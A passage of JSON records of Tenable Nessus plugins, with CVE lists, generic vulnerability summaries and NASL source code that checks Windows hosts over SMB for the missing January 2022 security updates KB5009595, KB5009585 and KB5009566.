bulletin:bulletin,\n rollup_kb_list:[5009619,5009586])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:18:16", "description": "The remote Windows host is missing security update 5009595 or cumulative update 5009624. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21899, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21864, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21875, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009595: Windows 8.1 and Windows Server 2012 R2 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21875", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009595.NASL", "href": "https://www.tenable.com/plugins/nessus/156624", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156624);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21875\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009595\");\n script_xref(name:\"MSKB\", value:\"5009624\");\n script_xref(name:\"MSFT\", value:\"MS22-5009595\");\n script_xref(name:\"MSFT\", value:\"MS22-5009624\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009595: Windows 8.1 and Windows Server 2012 R2 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009595\nor cumulative update 5009624. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21899, CVE-2022-21900,\n CVE-2022-21905, CVE-2022-21913, CVE-2022-21924,\n CVE-2022-21925)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21864, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21875,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21903, CVE-2022-21908, CVE-2022-21914,\n CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904,\n CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850,\n CVE-2022-21851, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009624\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5009595 or Cumulative Update KB5009624.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009624',\n '5009595'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009624, 5009595])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:56", "description": "The remote Windows host is missing security update 5009585. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21962, CVE-2022-21959, CVE-2022-21963, CVE-2022-21960, CVE-2022-21928, CVE-2022-21874, CVE-2022-21961, CVE-2022-21958, CVE-2022-21893, CVE-2022-21892, CVE-2022-21878, CVE-2022-21851, CVE-2022-21850, CVE-2022-21849, CVE-2022-21922) \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21908, CVE-2022-21903, CVE-2022-21901, CVE-2022-21897, CVE-2022-21885, CVE-2022-21881, CVE-2022-21875, CVE-2022-21873, CVE-2022-21870, CVE-2022-21868, CVE-2022-21867, CVE-2022-21866, CVE-2022-21864, CVE-2022-21862, CVE-2022-21860, CVE-2022-21859, CVE-2022-21857, CVE-2022-21838, CVE-2022-21835, CVE-2022-21834, CVE-2022-21833, CVE-2022-21914, CVE-2022-21895, CVE-2022-21916, CVE-2022-21919, CVE-2022-21871, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009585: Windows 10 LTS 1507 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21878", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21911", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009585.NASL", "href": "https://www.tenable.com/plugins/nessus/156623", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156623);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21878\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21911\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009585\");\n script_xref(name:\"MSFT\", value:\"MS22-5009585\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009585: Windows 10 LTS 1507 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009585. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands. \n (CVE-2022-21962, CVE-2022-21959, CVE-2022-21963,\n CVE-2022-21960, CVE-2022-21928, CVE-2022-21874,\n CVE-2022-21961, CVE-2022-21958, CVE-2022-21893,\n CVE-2022-21892, CVE-2022-21878, CVE-2022-21851,\n CVE-2022-21850, CVE-2022-21849, CVE-2022-21922)\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21908, CVE-2022-21903, CVE-2022-21901,\n CVE-2022-21897, CVE-2022-21885, CVE-2022-21881,\n CVE-2022-21875, CVE-2022-21873, CVE-2022-21870,\n CVE-2022-21868, CVE-2022-21867, CVE-2022-21866,\n CVE-2022-21864, CVE-2022-21862, CVE-2022-21860,\n CVE-2022-21859, CVE-2022-21857, CVE-2022-21838,\n CVE-2022-21835, CVE-2022-21834, CVE-2022-21833,\n CVE-2022-21914, CVE-2022-21895, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21871, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, \n CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009585\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009585\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009585'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:'10240',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009585])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:17", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009566: Windows 11 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009566.NASL", "href": "https://www.tenable.com/plugins/nessus/156622", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156622);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21887\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009566\");\n script_xref(name:\"MSFT\", value:\"MS22-5009566\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009566: Windows 11 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, 